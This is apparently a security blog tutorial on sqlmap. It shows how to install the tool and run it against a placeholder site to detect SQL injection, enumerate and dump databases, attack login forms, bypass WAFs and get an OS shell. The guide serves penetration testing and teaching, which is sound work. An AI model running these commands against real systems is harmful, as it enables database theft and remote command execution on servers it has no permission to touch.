← Back

SQLMap: The Ultimate Guide to Automated SQL Injection

sqlmap is one of the most powerful open-source tools for automating the process of detecting and exploiting SQL injection vulnerabilities in web applications. Whether you're a penetration tester, bug bounty hunter, or cybersecurity enthusiast, mastering sqlmap can greatly enhance your ability to find security flaws in applications.

What is sqlmap?

sqlmap is an automated tool written in Python that helps security professionals identify and exploit SQL injection vulnerabilities. It supports a wide range of database management systems, including:

  • MySQL
  • PostgreSQL
  • Oracle
  • Microsoft SQL Server
  • SQLite
  • DB2
  • and more...

It can be used to:

  • Detect and exploit SQL injection vulnerabilities
  • Extract data from the database
  • Read and write files on the database server
  • Gain remote shell access

Installation

sqlmap comes pre-installed in many popular penetration testing distributions like Kali Linux. However, if you're on a different system or want to install it manually, follow these steps:

Requirements

  • Python 3.8 or later

Clone from GitHub

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev

You can now run sqlmap directly:

python3 sqlmap.py -h

Or make an alias:

alias sqlmap="python3 /full/path/to/sqlmap-dev/sqlmap.py"

Basic Usage

Here are some essential examples to get started with sqlmap.

Test a URL for SQL Injection

python3 sqlmap.py -u "http://target.com/page.php?id=1" --batch
  • -u: Specifies the target URL.
  • --batch: Runs in non-interactive mode, using default answers.

Enumerate Databases

python3 sqlmap.py -u "http://target.com/page.php?id=1" --dbs

List Tables in a Specific Database

python3 sqlmap.py -u "http://target.com/page.php?id=1" -D database_name --tables

List Columns in a Table

python3 sqlmap.py -u "http://target.com/page.php?id=1" -D database_name -T table_name --columns

Dump Data from a Table

python3 sqlmap.py -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump

Advanced Features

Specify Parameter to Test

python3 sqlmap.py -u "http://target.com/page.php?id=1&name=admin" -p name

Use HTTP POST Request

python3 sqlmap.py -u "http://target.com/login.php" --data="username=admin&password=pass"

Bypass WAF

python3 sqlmap.py -u "http://target.com/page.php?id=1" --tamper=between

OS Command Execution (If injectable)

python3 sqlmap.py -u "http://target.com/page.php?id=1" --os-shell

Ethical Warning

sqlmap should only be used on systems you have explicit permission to test. Unauthorized scanning and exploitation are illegal and unethical.

Final Thoughts

sqlmap simplifies the complex process of finding and exploiting SQL injections. By learning to use its full capabilities, you can become more effective in securing (or testing the security of) web applications.

***
Note on Content Creation: This article was developed with the assistance of generative AI like Gemini or ChatGPT. While all public AI strives for accuracy and comprehensive coverage, all content is reviewed and edited by human experts at IsoSecu to ensure factual correctness, relevance, and adherence to our editorial standards.